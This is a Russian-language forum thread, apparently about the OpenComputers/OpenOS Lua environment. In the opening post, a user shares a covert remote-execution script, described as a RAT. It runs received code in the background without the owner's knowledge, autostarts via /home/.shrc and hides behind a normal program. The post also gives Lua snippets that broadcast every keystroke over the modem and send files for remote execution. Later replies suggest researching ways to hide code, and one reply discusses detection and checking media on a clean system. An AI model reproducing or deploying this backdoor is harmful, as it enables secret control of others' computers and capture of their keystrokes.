Oleshe 36 Опубликовано: 31 марта, 2023 Этот скрипт позволяет выполнять код без ведома владельца. Оно выполняет их в фоне. Нужно ручная настройка. Именно: У нас есть 3 переменные которые нужно будет изменять вам ведь вам лучше решать где и что будет, переменные: NOWPATH - Там откуда запускается скрипт. Я не знаю как сделать так что-бы оно само определяло так-что можете там строчку помочь. YOURPATH - Конечный файл, то где будет лежать скрипт. STARTLINE - Откуда начинать копирование, снос строк. Сделано для того что-бы можно было нормальной программой прикрыть нашу. Автозапуск скрипта записывается в /home/.shrc. Что прописать для того что-бы оно выполнено: modem.broadcast(200,'execute','print("Hello World"') Имейте в виду что компьютеру нужно время для выполнений ваших программ, любую прогу советую пихать в "многопоточность" или хотя-бы в event.listen. Пример: Скрытый текст require('event').listen('key_down',function(...) require('component').modem.broadcast(200,...) end) Будет "тревожить" нас по каждому нажатию клавиши. Так-же я сделал простенький экзекутер: Скрытый текст local cmp = require('component') local modem = cmp.modem modem.open(200) local args = {...} if require('filesystem').exists(args[1]) then local handle = io.open(args[1]) modem.broadcast(200,'execute',handle:read(math.huge)) handle:close() else print('File does not exists') end Юсаге: executer_file_name file_name Пока только для OpenOS. Сделано оно максимально безпалевно, но .shrc палит. Пока не знаю что с этим сделать. Цитата Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
hohserg 197 Опубликовано: 3 апреля, 2023 В 31.03.2023 в 20:00, Oleshe сказал: NOWPATH os.getenv("_") 1 Цитата Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
hohserg 197 Опубликовано: 3 апреля, 2023 А насколько сложно найти RAT на своем компудахтере? Предлагаю провести исследование и разработать методы сокрытия кода на компе ОС Цитата Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
eu_tomat 2 154 Опубликовано: 3 апреля, 2023 3 часа назад, hohserg сказал: А насколько сложно найти RAT на своем компудахтере? Насколько я понял из мутного описания, RAT не является вирусом. Это лишь способ спрятать произвольный код в одном из файлов. Он может как являться вирусом, так и не быть им. Сложность обнаружения модификации всецело зависит от конкретного кода. Если внедрённый код перехватывает системные вызовы, то его обнаружение может стать практически невозможным в скомпрометированной системе. С другой стороны, проверка скомпрометированных носителей на чистой системе способна однозначно обнаружить любую модификацию. Это если говорить о чисто системных файлах. Найти же зловредный участок кода в пользовательских программах и библиотеках, не имея эталона файлов, вряд ли возможно, т.к. эталон зачастую отсутствует. Максимум, можно формировать эталон динамически для каждого отдельно взятого компьютера или группы компьютеров. Но сложность тут снова в том, что проверку на соответствие эталону имеет смысл проводить лишь на гарантированно чистой системе. 3 часа назад, hohserg сказал: Предлагаю провести исследование и разработать методы сокрытия кода на компе ОС В любом случае я предпочитаю считать скомпрометированным любой компьютер, на котором кто-либо мог запускать произвольный код или извлекать компоненты в моё отсутствие. Все носители такого компьютера следует тестировать в гарантированно чистой среде. 2 Цитата Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах